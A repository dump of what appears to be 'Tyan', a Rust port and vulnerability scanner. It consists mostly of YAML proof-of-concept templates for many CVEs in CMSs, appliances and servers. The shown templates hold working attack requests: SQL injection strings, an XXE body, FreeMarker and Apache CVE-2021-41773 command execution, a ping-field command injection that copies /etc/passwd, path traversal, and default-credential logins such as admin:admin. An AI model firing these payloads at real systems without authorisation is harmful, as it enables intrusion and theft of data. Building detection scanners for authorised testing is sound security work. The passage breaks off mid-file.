├── .github └── workflows │ └── release.yml ├── Cargo.toml ├── LICENSE.txt ├── README.md ├── doc ├── gzh.jpg └── wx.jpg └── src ├── core ├── host_discovery.rs ├── mod.rs ├── nmap-service-probes.txt ├── port_scanner.rs ├── result_storage.rs ├── scanner.rs └── service_info.rs ├── lib.rs ├── main.rs └── plugins ├── config.yaml ├── mod.rs ├── pocs ├── 74cms-sqli-1.yml ├── 74cms-sqli-2.yml ├── 74cms-sqli.yml ├── CVE-2017-7504-Jboss-serialization-RCE.yml ├── CVE-2022-22947.yml ├── CVE-2022-22954-VMware-RCE.yml ├── CVE-2022-26134.yml ├── Hotel-Internet-Manage-RCE.yml ├── Struts2-062-cve-2021-31805-rce.yml ├── active-directory-certsrv-detect.yml ├── activemq-cve-2016-3088.yml ├── activemq-default-password.yml ├── airflow-unauth.yml ├── alibaba-canal-default-password.yml ├── alibaba-canal-info-leak.yml ├── alibaba-nacos-v1-auth-bypass.yml ├── alibaba-nacos.yml ├── amtt-hiboss-server-ping-rce.yml ├── apache-ambari-default-password.yml ├── apache-axis-webservice-detect.yml ├── apache-druid-cve-2021-36749.yml ├── apache-flink-upload-rce.yml ├── apache-httpd-cve-2021-40438-ssrf.yml ├── apache-httpd-cve-2021-41773-path-traversal.yml ├── apache-httpd-cve-2021-41773-rce.yml ├── apache-kylin-unauth-cve-2020-13937.yml ├── apache-nifi-api-unauthorized-access.yml ├── apache-ofbiz-cve-2018-8033-xxe.yml ├── apache-ofbiz-cve-2020-9496-xml-deserialization.yml ├── aspcms-backend-leak.yml ├── backup-file.yml ├── bash-cve-2014-6271.yml ├── bt742-pma-unauthorized-access.yml ├── cacti-weathermap-file-write.yml ├── chinaunicom-modem-default-password.yml ├── cisco-cve-2020-3452-readfile.yml ├── citrix-cve-2019-19781-path-traversal.yml ├── citrix-cve-2020-8191-xss.yml ├── citrix-cve-2020-8193-unauthorized.yml ├── citrix-xenmobile-cve-2020-8209.yml ├── coldfusion-cve-2010-2861-lfi.yml ├── confluence-cve-2015-8399.yml ├── confluence-cve-2019-3396-lfi.yml ├── confluence-cve-2021-26084.yml ├── confluence-cve-2021-26085-arbitrary-file-read.yml ├── consul-rexec-rce.yml ├── consul-service-rce.yml ├── coremail-cnvd-2019-16798.yml ├── couchcms-cve-2018-7662.yml ├── couchdb-cve-2017-12635.yml ├── couchdb-unauth.yml ├── craftcms-seomatic-cve-2020-9757-rce.yml ├── datang-ac-default-password-cnvd-2021-04128.yml ├── dedecms-carbuyaction-fileinclude.yml ├── dedecms-cve-2018-6910.yml ├── dedecms-cve-2018-7700-rce.yml ├── dedecms-guestbook-sqli.yml ├── dedecms-membergroup-sqli.yml ├── dedecms-url-redirection.yml ├── discuz-ml3x-cnvd-2019-22239.yml ├── discuz-v72-sqli.yml ├── discuz-wechat-plugins-unauth.yml ├── discuz-wooyun-2010-080723.yml ├── django-CVE-2018-14574.yml ├── dlink-850l-info-leak.yml ├── dlink-cve-2019-16920-rce.yml ├── dlink-cve-2019-17506.yml ├── dlink-cve-2020-25078-account-disclosure.yml ├── dlink-cve-2020-9376-dump-credentials.yml ├── dlink-dsl-2888a-rce.yml ├── docker-api-unauthorized-rce.yml ├── docker-registry-api-unauth.yml ├── dotnetcms-sqli.yml ├── draytek-cve-2020-8515.yml ├── druid-monitor-unauth.yml ├── drupal-cve-2014-3704-sqli.yml ├── drupal-cve-2018-7600-rce.yml ├── drupal-cve-2019-6340.yml ├── dubbo-admin-default-password.yml ├── duomicms-sqli.yml ├── dvr-cve-2018-9995.yml ├── e-office-v10-sql-inject.yml ├── e-office-v9-upload-cnvd-2021-49104.yml ├── e-zkeco-cnvd-2020-57264-read-file.yml ├── ecology-arbitrary-file-upload.yml ├── ecology-filedownload-directory-traversal.yml ├── ecology-javabeanshell-rce.yml ├── ecology-springframework-directory-traversal.yml ├── ecology-syncuserinfo-sqli.yml ├── ecology-v8-sqli.yml ├── ecology-validate-sqli.yml ├── ecology-workflowcentertreedata-sqli.yml ├── ecology-workflowservicexml.yml ├── ecshop-cnvd-2020-58823-sqli.yml ├── ecshop-collection-list-sqli.yml ├── ecshop-login-sqli.yml ├── ecshop-rce.yml ├── eea-info-leak-cnvd-2021-10543.yml ├── elasticsearch-cve-2014-3120.yml ├── elasticsearch-cve-2015-1427.yml ├── elasticsearch-cve-2015-3337-lfi.yml ├── elasticsearch-cve-2015-5531.yml ├── elasticsearch-unauth.yml ├── etcd-unauth.yml ├── etcd-v3-unauth.yml ├── etouch-v2-sqli.yml ├── exchange-cve-2021-26855-ssrf.yml ├── eyou-rce.yml ├── ezoffice-dpwnloadhttp.jsp-filedownload.yml ├── f5-cve-2021-22986.yml ├── f5-cve-2022-1388.yml ├── f5-tmui-cve-2020-5902-rce.yml ├── fangweicms-sqli.yml ├── fckeditor-info.yml ├── feifeicms-lfr.yml ├── finecms-sqli.yml ├── finereport-directory-traversal.yml ├── finereport-v8-arbitrary-file-read.yml ├── flexpaper-cve-2018-11686.yml ├── flink-jobmanager-cve-2020-17519-lfi.yml ├── fortigate-cve-2018-13379-readfile.yml ├── frp-dashboard-unauth.yml ├── gateone-cve-2020-35736.yml ├── gilacms-cve-2020-5515.yml ├── gitlab-graphql-info-leak-cve-2020-26413.yml ├── gitlab-ssrf-cve-2021-22214.yml ├── gitlist-rce-cve-2018-1000533.yml ├── glassfish-cve-2017-1000028-lfi.yml ├── go-pprof-leak.yml ├── gocd-cve-2021-43287.yml ├── h2-database-web-console-unauthorized-access.yml ├── h3c-imc-rce.yml ├── h3c-secparh-any-user-login.yml ├── h5s-video-platform-cnvd-2020-67113-unauth.yml ├── hadoop-yarn-unauth.yml ├── hanming-video-conferencing-file-read.yml ├── harbor-cve-2019-16097.yml ├── hikvision-cve-2017-7921.yml ├── hikvision-gateway-data-file-read.yml ├── hikvision-info-leak.yml ├── hikvision-intercom-service-default-password.yml ├── hikvision-showfile-file-read.yml ├── hikvision-unauthenticated-rce-cve-2021-36260.yml ├── hjtcloud-arbitrary-fileread.yml ├── hjtcloud-directory-file-leak.yml ├── huawei-home-gateway-hg659-fileread.yml ├── ifw8-router-cve-2019-16313.yml ├── iis-put-getshell.yml ├── influxdb-unauth.yml ├── inspur-tscev4-cve-2020-21224-rce.yml ├── jboss-cve-2010-1871.yml ├── jboss-unauth.yml ├── jeewms-showordownbyurl-fileread.yml ├── jellyfin-file-read-cve-2021-21402.yml ├── jenkins-cve-2018-1000600.yml ├── jenkins-cve-2018-1000861-rce.yml ├── jenkins-unauthorized-access.yml ├── jetty-cve-2021-28164.yml ├── jira-cve-2019-11581.yml ├── jira-cve-2019-8442.yml ├── jira-cve-2019-8449.yml ├── jira-cve-2020-14179.yml ├── jira-cve-2020-14181.yml ├── jira-ssrf-cve-2019-8451.yml ├── joomla-cnvd-2019-34135-rce.yml ├── joomla-component-vreview-sql.yml ├── joomla-cve-2015-7297-sqli.yml ├── joomla-cve-2017-8917-sqli.yml ├── joomla-cve-2018-7314-sql.yml ├── joomla-ext-zhbaidumap-cve-2018-6605-sqli.yml ├── jumpserver-unauth-rce.yml ├── jupyter-notebook-unauthorized-access.yml ├── kafka-manager-unauth.yml ├── kibana-cve-2018-17246.yml ├── kibana-unauth.yml ├── kingdee-eas-directory-traversal.yml ├── kingsoft-v8-default-password.yml ├── kingsoft-v8-file-read.yml ├── kong-cve-2020-11710-unauth.yml ├── kubernetes-unauth.yml ├── kyan-network-monitoring-account-password-leakage.yml ├── landray-oa-custom-jsp-fileread.yml ├── lanproxy-cve-2021-3019-lfi.yml ├── laravel-cve-2021-3129.yml ├── laravel-debug-info-leak.yml ├── laravel-improper-webdir.yml ├── maccms-rce.yml ├── maccmsv10-backdoor.yml ├── metinfo-cve-2019-16996-sqli.yml ├── metinfo-cve-2019-16997-sqli.yml ├── metinfo-cve-2019-17418-sqli.yml ├── metinfo-file-read.yml ├── metinfo-lfi-cnvd-2018-13393.yml ├── minio-default-password.yml ├── mongo-express-cve-2019-10758.yml ├── mpsec-isg1000-file-read.yml ├── msvod-sqli.yml ├── myucms-lfr.yml ├── nagio-cve-2018-10735.yml ├── nagio-cve-2018-10736.yml ├── nagio-cve-2018-10737.yml ├── nagio-cve-2018-10738.yml ├── natshell-arbitrary-file-read.yml ├── netentsec-icg-default-password.yml ├── netentsec-ngfw-rce.yml ├── netgear-cve-2017-5521.yml ├── nextjs-cve-2017-16877.yml ├── nexus-cve-2019-7238.yml ├── nexus-cve-2020-10199.yml ├── nexus-cve-2020-10204.yml ├── nexus-default-password.yml ├── nexusdb-cve-2020-24571-path-traversal.yml ├── nhttpd-cve-2019-16278.yml ├── node-red-dashboard-file-read-cve-2021-3223.yml ├── novnc-url-redirection-cve-2021-3654.yml ├── nps-default-password.yml ├── ns-asg-file-read.yml ├── nsfocus-uts-password-leak.yml ├── nuuo-file-inclusion.yml ├── odoo-file-read.yml ├── openfire-cve-2019-18394-ssrf.yml ├── opentsdb-cve-2020-35476-rce.yml ├── panabit-gateway-default-password.yml ├── panabit-ixcache-default-password.yml ├── pandorafms-cve-2019-20224-rce.yml ├── pbootcms-database-file-download.yml ├── php-cgi-cve-2012-1823.yml ├── phpcms-cve-2018-19127.yml ├── phpmyadmin-cve-2018-12613-file-inclusion.yml ├── phpmyadmin-setup-deserialization.yml ├── phpok-sqli.yml ├── phpshe-sqli.yml ├── phpstudy-backdoor-rce.yml ├── phpstudy-nginx-wrong-resolve.yml ├── phpunit-cve-2017-9841-rce.yml ├── powercreator-arbitrary-file-upload.yml ├── prometheus-url-redirection-cve-2021-29622.yml ├── pulse-cve-2019-11510.yml ├── pyspider-unauthorized-access.yml ├── qibocms-sqli.yml ├── qilin-bastion-host-rce.yml ├── qizhi-fortressaircraft-unauthorized.yml ├── qnap-cve-2019-7192.yml ├── rabbitmq-default-password.yml ├── rails-cve-2018-3760-rce.yml ├── razor-cve-2018-8770.yml ├── rconfig-cve-2019-16663.yml ├── resin-cnnvd-200705-315.yml ├── resin-inputfile-fileread-or-ssrf.yml ├── resin-viewfile-fileread.yml ├── rockmongo-default-password.yml ├── ruijie-eg-cli-rce.yml ├── ruijie-eg-file-read.yml ├── ruijie-eg-info-leak.yml ├── ruijie-eweb-rce-cnvd-2021-09650.yml ├── ruijie-nbr1300g-cli-password-leak.yml ├── ruijie-uac-cnvd-2021-14536.yml ├── ruoyi-management-fileread.yml ├── saltstack-cve-2020-16846.yml ├── saltstack-cve-2021-25282-file-write.yml ├── samsung-wea453e-default-pwd.yml ├── samsung-wea453e-rce.yml ├── samsung-wlan-ap-wea453e-rce.yml ├── sangfor-ad-download.php-filedownload.yml ├── sangfor-ba-rce.yml ├── sangfor-edr-arbitrary-admin-login.yml ├── sangfor-edr-cssp-rce.yml ├── sangfor-edr-tool-rce.yml ├── satellian-cve-2020-7980-rce.yml ├── seacms-before-v992-rce.yml ├── seacms-rce.yml ├── seacms-sqli.yml ├── seacms-v654-rce.yml ├── seacmsv645-command-exec.yml ├── secnet-ac-default-password.yml ├── seeyon-a6-employee-info-leak.yml ├── seeyon-a6-test-jsp-sql.yml ├── seeyon-ajax-unauthorized-access.yml ├── seeyon-cnvd-2020-62422-readfile.yml ├── seeyon-oa-a8-m-information-disclosure.yml ├── seeyon-oa-cookie-leak.yml ├── seeyon-session-leak.yml ├── seeyon-setextno-jsp-sql.yml ├── seeyon-unauthoried.yml ├── seeyon-wooyun-2015-0108235-sqli.yml ├── seeyon-wooyun-2015-148227.yml ├── shiro-key.yml ├── shiziyu-cms-apicontroller-sqli.yml ├── shopxo-cnvd-2021-15822.yml ├── showdoc-default-password.yml ├── showdoc-uploadfile.yml ├── skywalking-cve-2020-9483-sqli.yml ├── solarwinds-cve-2020-10148.yml ├── solr-cve-2017-12629-xxe.yml ├── solr-cve-2019-0193.yml ├── solr-fileread.yml ├── solr-velocity-template-rce.yml ├── sonarqube-cve-2020-27986-unauth.yml ├── sonicwall-ssl-vpn-rce.yml ├── spark-api-unauth.yml ├── spark-webui-unauth.yml ├── spon-ip-intercom-ping-rce.yml ├── spring-actuator-heapdump-file.yml ├── spring-cloud-cve-2020-5405.yml ├── spring-cloud-cve-2020-5410.yml ├── spring-core-rce.yml ├── spring-cve-2016-4977.yml ├── springboot-cve-2021-21234.yml ├── springboot-env-unauth.yml ├── springcloud-cve-2019-3799.yml ├── sql-file.yml ├── struts2-045.yml ├── struts2-046-1.yml ├── supervisord-cve-2017-11610.yml ├── swagger-ui-unauth.yml ├── tamronos-iptv-rce.yml ├── telecom-gateway-default-password.yml ├── tensorboard-unauth.yml ├── terramaster-cve-2020-15568.yml ├── terramaster-tos-rce-cve-2020-28188.yml ├── thinkadmin-v6-readfile.yml ├── thinkcmf-lfi.yml ├── thinkcmf-write-shell.yml ├── thinkphp-v6-file-write.yml ├── thinkphp5-controller-rce.yml ├── thinkphp5023-method-rce.yml ├── tianqing-info-leak.yml ├── tomcat-cve-2017-12615-rce.yml ├── tomcat-cve-2018-11759.yml ├── tomcat-manager-weak.yml ├── tongda-insert-sql-inject.yml ├── tongda-meeting-unauthorized-access.yml ├── tongda-oa-v11.9-api.ali.php-upload.yml ├── tongda-user-session-disclosure.yml ├── tongda-v2017-uploadfile.yml ├── tpshop-directory-traversal.yml ├── tpshop-sqli.yml ├── tvt-nvms-1000-file-read-cve-2019-20085.yml ├── typecho-rce.yml ├── ueditor-cnvd-2017-20077-file-upload.yml ├── uwsgi-cve-2018-7490.yml ├── vbulletin-cve-2019-16759-bypass.yml ├── vbulletin-cve-2019-16759.yml ├── vmware-vcenter-arbitrary-file-read.yml ├── vmware-vcenter-cve-2021-21985-rce.yml ├── vmware-vcenter-unauthorized-rce-cve-2021-21972.yml ├── vmware-vrealize-cve-2021-21975-ssrf.yml ├── weaver-E-Cology-getSqlData-sqli.yml ├── weaver-ebridge-file-read.yml ├── weaver-oa-eoffice-v9-upload-getshell.yml ├── weblogic-console-weak.yml ├── weblogic-cve-2017-10271.yml ├── weblogic-cve-2019-2725.yml ├── weblogic-cve-2019-2729-1.yml ├── weblogic-cve-2019-2729-2.yml ├── weblogic-cve-2020-14750.yml ├── weblogic-ssrf.yml ├── webmin-cve-2019-15107-rce.yml ├── weiphp-path-traversal.yml ├── weiphp-sql.yml ├── wifisky-default-password-cnvd-2021-39012.yml ├── wordpress-cve-2019-19985-infoleak.yml ├── wordpress-ext-adaptive-images-lfi.yml ├── wordpress-ext-mailpress-rce.yml ├── wuzhicms-v410-sqli.yml ├── xdcms-sql.yml ├── xiuno-bbs-cvnd-2019-01348-reinstallation.yml ├── xunchi-cnvd-2020-23735-file-read.yml ├── yapi-rce.yml ├── yccms-rce.yml ├── yonyou-grp-u8-sqli-to-rce.yml ├── yonyou-grp-u8-sqli.yml ├── yonyou-nc-arbitrary-file-upload.yml ├── yonyou-nc-bsh-servlet-bshservlet-rce.yml ├── yonyou-u8-oa-sqli.yml ├── youphptube-encoder-cve-2019-5127.yml ├── youphptube-encoder-cve-2019-5128.yml ├── youphptube-encoder-cve-2019-5129.yml ├── yungoucms-sqli.yml ├── zabbix-authentication-bypass.yml ├── zabbix-cve-2016-10134-sqli.yml ├── zabbix-default-password.yml ├── zcms-v3-sqli.yml ├── zeit-nodejs-cve-2020-5284-directory-traversal.yml ├── zeroshell-cve-2019-12725-rce.yml ├── zimbra-cve-2019-9670-xxe.yml └── zzcms-zsmanage-sqli.yml ├── rabbitmq_plugin.rs ├── ssh_plugin.rs ├── web_plugin.rs ├── web_poc_plugin.rs └── web_title_plugin.rs /doc/gzh.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TheBlindM/Tyan/4d898e995aaab852a33250a8922d884a935e6aec/doc/gzh.jpg -------------------------------------------------------------------------------- /doc/wx.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TheBlindM/Tyan/4d898e995aaab852a33250a8922d884a935e6aec/doc/wx.jpg -------------------------------------------------------------------------------- /src/core/mod.rs: -------------------------------------------------------------------------------- 1 | pub mod host_discovery; 2 | pub mod port_scanner; 3 | pub mod scanner; 4 | pub mod service_info; 5 | pub mod result_storage; 6 | -------------------------------------------------------------------------------- /src/lib.rs: -------------------------------------------------------------------------------- 1 | pub mod core; 2 | pub mod plugins; 3 | 4 | pub use crate::core::host_discovery::HostDiscovery; 5 | pub use crate::core::port_scanner::PortScanner; 6 | pub use crate::core::service_info::{identify_service, ScanResult, ServiceInfo, ServiceScanOptions, ServiceScanner}; 7 | -------------------------------------------------------------------------------- /src/plugins/pocs/74cms-sqli-1.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-74cms-sqli-1 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: POST 6 | path: /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709\xc3\x97tamp=&nonce= 7 | headers: 8 | Content-Type: 'text/xml' 9 | body: ]>&test;111112331%' union select md5({{rand}})# 10 | follow_redirects: false 11 | expression: | 12 | response.body.bcontains(bytes(md5(string(rand)))) 13 | detail: 14 | author: betta(https://github.com/betta-cyber) 15 | links: 16 | - https://www.uedbox.com/post/29340 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/74cms-sqli-2.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-74cms-sqli-2 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{rand}}),5,6,7,8,9%23 7 | expression: | 8 | response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: rexus 11 | links: 12 | - https://www.uedbox.com/post/30019/ 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/74cms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-74cms-sqli 2 | rules: 3 | - method: GET 4 | path: /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5(99999999))) -- a 5 | expression: | 6 | response.body.bcontains(b"ef775988943825d2871e1cfa75473ec") 7 | detail: 8 | author: jinqi 9 | links: 10 | - https://www.t00ls.net/articles-54436.html 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/CVE-2017-7504-Jboss-serialization-RCE.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-CVE-2017-7504-Jboss-serialization-RCE 2 | rules: 3 | - method: GET 4 | path: /jbossmq-httpil/HTTPServerILServlet 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b'This is the JBossMQ HTTP-IL') 7 | detail: 8 | author: mamba 9 | description: "CVE-2017-7504-Jboss-serialization-RCE by chaosec公众号" 10 | links: 11 | - https://github.com/chaosec2021 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/CVE-2022-22954-VMware-RCE.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-CVE-2022-22954-VMware-RCE 2 | rules: 3 | - method: GET 4 | path: /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b"freemarker%2etemplate%2eutility%2eExecute"%3fnew%28%29%28"id"%29%7d 5 | expression: | 6 | response.status == 400 && "device id:".bmatches(response.body) 7 | detail: 8 | author: mamba 9 | description: "CVE-2022-22954-VMware-RCE by chaosec公众号" 10 | links: 11 | - https://github.com/chaosec2021 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/Hotel-Internet-Manage-RCE.yml: -------------------------------------------------------------------------------- 1 | name: Hotel-Internet-Manage-RCE 2 | rules: 3 | - method: GET 4 | path: "/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../Test.txt&id=1" 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"parent.doTestResult") 7 | detail: 8 | author: test 9 | Affected Version: "Hotel Internet Billing & Operation Support System" 10 | links: 11 | - http://118.190.97.19:88/qingy/Web%E5%AE%89%E5%85%A8 12 | 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/active-directory-certsrv-detect.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-active-directory-certsrv-detect 2 | rules: 3 | - method: GET 4 | path: /certsrv/certrqad.asp 5 | follow_redirects: false 6 | expression: | 7 | response.status == 401 && "Server" in response.headers && response.headers["Server"].contains("Microsoft-IIS") && response.body.bcontains(bytes("401 - ")) && "Www-Authenticate" in response.headers && response.headers["Www-Authenticate"].contains("Negotiate") && "Www-Authenticate" in response.headers && response.headers["Www-Authenticate"].contains("NTLM") 8 | detail: 9 | author: AgeloVito 10 | links: 11 | - https://www.cnblogs.com/EasonJim/p/6859345.html 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/activemq-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-activemq-default-password 2 | rules: 3 | - method: GET 4 | path: /admin/ 5 | expression: | 6 | response.status == 401 && response.body.bcontains(b"Unauthorized") 7 | - method: GET 8 | path: /admin/ 9 | headers: 10 | Authorization: Basic YWRtaW46YWRtaW4= 11 | expression: | 12 | response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"

Broker

") 13 | detail: 14 | author: pa55w0rd(www.pa55w0rd.online/) 15 | links: 16 | - https://blog.csdn.net/ge00111/article/details/72765210 -------------------------------------------------------------------------------- /src/plugins/pocs/airflow-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-airflow-unauth 2 | rules: 3 | - method: GET 4 | path: /admin/ 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"Airflow - DAGs") && response.body.bcontains(b"

DAGs

") 7 | detail: 8 | author: pa55w0rd(www.pa55w0rd.online/) 9 | links: 10 | - http://airflow.apache.org/ 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/alibaba-canal-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-alibaba-canal-default-password 2 | rules: 3 | - method: POST 4 | path: /api/v1/user/login 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"com.alibaba.otter.canal.admin.controller.UserController.login") 7 | - method: POST 8 | path: /api/v1/user/login 9 | headers: 10 | Content-Type: application/json 11 | body: >- 12 | {"username":"admin","password":"123456"} 13 | follow_redirects: false 14 | expression: | 15 | response.status == 200 && response.body.bcontains(b"{\"code\":20000,") && response.body.bcontains(b"\"data\":{\"token\"") 16 | detail: 17 | author: jweny(https://github.com/jweny) 18 | links: 19 | - https://www.cnblogs.com/xiexiandong/p/12888582.html 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/alibaba-canal-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-alibaba-canal-info-leak 2 | rules: 3 | - method: GET 4 | path: /api/v1/canal/config/1/1 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"ncanal.aliyun.accessKey") && response.body.bcontains(b"ncanal.aliyun.secretKey") 8 | detail: 9 | author: Aquilao(https://github.com/Aquilao) 10 | info: alibaba Canal info leak 11 | links: 12 | - https://my.oschina.net/u/4581879/blog/4753320 -------------------------------------------------------------------------------- /src/plugins/pocs/alibaba-nacos.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-alibaba-nacos 2 | rules: 3 | - method: GET 4 | path: /nacos/ 5 | follow_redirects: true 6 | expression: | 7 | response.body.bcontains(bytes("Nacos")) 8 | detail: 9 | author: AgeloVito 10 | info: alibaba-nacos 11 | login: nacos/nacos 12 | links: 13 | - https://blog.csdn.net/caiqiiqi/article/details/112005424 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/apache-ambari-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-ambari-default-password 2 | rules: 3 | - method: GET 4 | path: /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name 5 | headers: 6 | Authorization: Basic YWRtaW46YWRtaW4= 7 | expression: response.status == 200 && response.body.bcontains(b"PrivilegeInfo") && response.body.bcontains(b"AMBARI.ADMINISTRATOR") 8 | detail: 9 | author: wulalalaaa(https://github.com/wulalalaaa) 10 | links: 11 | - https://cwiki.apache.org/confluence/display/AMBARI/Quick+Start+Guide 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/apache-axis-webservice-detect.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-axis-webservice-detect 2 | sets: 3 | path: 4 | - services 5 | - servlet/AxisaxiServlet 6 | - servlet/AxisServlet 7 | - services/listServices 8 | - services/FreeMarkerService 9 | - services/AdminService 10 | - axis/services 11 | - axis2/services 12 | - axis/servlet/AxisServlet 13 | - axis2/servlet/AxisServlet 14 | - axis2/services/listServices 15 | - axis/services/FreeMarkerService 16 | - axis/services/AdminService 17 | rules: 18 | - method: GET 19 | path: /{{path}} 20 | expression: | 21 | response.body.bcontains(b"Services") && response.body.bcontains(b'?wsdl">') 22 | detail: 23 | author: AgeloVito 24 | links: 25 | - https://paper.seebug.org/1489 26 | -------------------------------------------------------------------------------- /src/plugins/pocs/apache-httpd-cve-2021-41773-path-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-httpd-cve-2021-41773-path-traversal 2 | groups: 3 | cgibin: 4 | - method: GET 5 | path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd 6 | expression: | 7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | icons: 9 | - method: GET 10 | path: /icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd 11 | expression: | 12 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 13 | detail: 14 | author: JingLing(https://github.com/shmilylty) 15 | links: 16 | - https://mp.weixin.qq.com/s/XEnjVwb9I0GPG9RG-v7lHQ -------------------------------------------------------------------------------- /src/plugins/pocs/apache-httpd-cve-2021-41773-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-httpd-cve-2021-41773-rce 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh 8 | body: echo;expr {{r1}} + {{r2}} 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 11 | detail: 12 | author: B1anda0(https://github.com/B1anda0) 13 | links: 14 | - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/apache-kylin-unauth-cve-2020-13937.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-kylin-unauth-cve-2020-13937 2 | rules: 3 | - method: GET 4 | path: /kylin/api/admin/config 5 | expression: | 6 | response.status == 200 && response.headers["Content-Type"].contains("application/json") && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url") 7 | detail: 8 | author: JingLing(github.com/shmilylty) 9 | links: 10 | - https://s.tencent.com/research/bsafe/1156.html 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/apache-nifi-api-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-nifi-api-unauthorized-access 2 | manual: true 3 | transport: http 4 | rules: 5 | - method: GET 6 | path: /nifi-api/flow/current-user 7 | follow_redirects: false 8 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"identity\":\"anonymous\",\"anonymous\":true") 9 | detail: 10 | author: wulalalaaa(https://github.com/wulalalaaa) 11 | links: 12 | - https://nifi.apache.org/docs/nifi-docs/rest-api/index.html 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/apache-ofbiz-cve-2018-8033-xxe.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-ofbiz-cve-2018-8033-xxe 2 | rules: 3 | - method: POST 4 | path: /webtools/control/xmlrpc 5 | headers: 6 | Content-Type: application/xml 7 | body: >- 8 | ]>&disclose; 9 | follow_redirects: false 10 | expression: > 11 | response.status == 200 && response.content_type.contains("text/xml") && "root:[x*]:0:0:".bmatches(response.body) 12 | detail: 13 | author: su(https://suzzz112113.github.io/#blog) 14 | links: 15 | - https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/aspcms-backend-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-aspcms-backend-leak 2 | rules: 3 | - method: GET 4 | path: /plug/oem/AspCms_OEMFun.asp 5 | expression: | 6 | response.status == 200 && "")) && response.body.bcontains(b"citrix") 13 | detail: 14 | author: JingLing(https://hackfun.org/) 15 | links: 16 | - https://support.citrix.com/article/CTX276688 17 | - https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/ 18 | - https://dmaasland.github.io/posts/citrix.html 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/citrix-cve-2020-8193-unauthorized.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-citrix-cve-2020-8193-unauthorized 2 | set: 3 | user: randomLowercase(8) 4 | pass: randomLowercase(8) 5 | rules: 6 | - method: POST 7 | path: "/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1" 8 | headers: 9 | Content-Type: application/xml 10 | X-NITRO-USER: '{{user}}' 11 | X-NITRO-PASS: '{{pass}}' 12 | body: 13 | follow_redirects: false 14 | expression: > 15 | response.status == 406 && "(?i)SESSID=\\w{32}".bmatches(bytes(response.headers["Set-Cookie"])) 16 | detail: 17 | author: bufsnake(https://github.com/bufsnake) 18 | links: 19 | - https://github.com/PR3R00T/CVE-2020-8193-Citrix-Scanner/blob/master/scanner.py 20 | - 